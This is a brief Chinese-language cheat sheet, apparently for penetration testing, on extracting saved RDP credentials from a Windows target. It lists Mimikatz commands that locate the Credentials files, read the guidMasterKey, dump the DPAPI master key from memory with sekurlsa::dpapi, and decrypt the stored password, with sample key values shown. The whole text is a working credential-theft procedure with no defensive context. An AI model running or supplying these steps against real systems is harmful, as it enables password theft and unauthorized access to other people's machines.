查看rdp連接記錄:
前提是目標在RDP連接是勾選了保存憑證:
查找本地的Credentials :
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
獲取guidMasterKey:
只要是同一個登錄的用戶,他保存的憑證的guidMasterKey都是一樣的。
Privilege::debug
dpapi::cred /in:C:\Users\yang\AppData\Local\Microsoft\Credentials\AF29D0CB13A586962EC0A626269806BD
目標guidMasterKey值為9380bd81-1a55-4b0d-af3b-2a69fe876968
繼續獲得MasterKey:
sekurlsa::dpapi
通過GUID:9380bd81-1a55-4b0d-af3b-2a69fe876968
獲得對應的MasterKey:7788e2c1bd5b9642f3da841b86edbd4e26f9b5af85f458c9fb4a9c858ea5c730b1abaecbf5ee1ec7fd7b4ace41f49b8be7d95577bcae9845cb599fbbffe745bc
解密憑證密碼:
dpapi::cred /in:C:\Users\yang\AppData\Local\Microsoft\Credentials\AF29D0CB13A586962EC0A626269806BD /masterkey:7788e2c1bd5b9642f3da841b86edbd4e26f9b5af85f458c9fb4a9c858ea5c730b1abaecbf5ee1ec7fd7b4ace41f49b8be7d95577bcae9845cb599fbbffe745bc
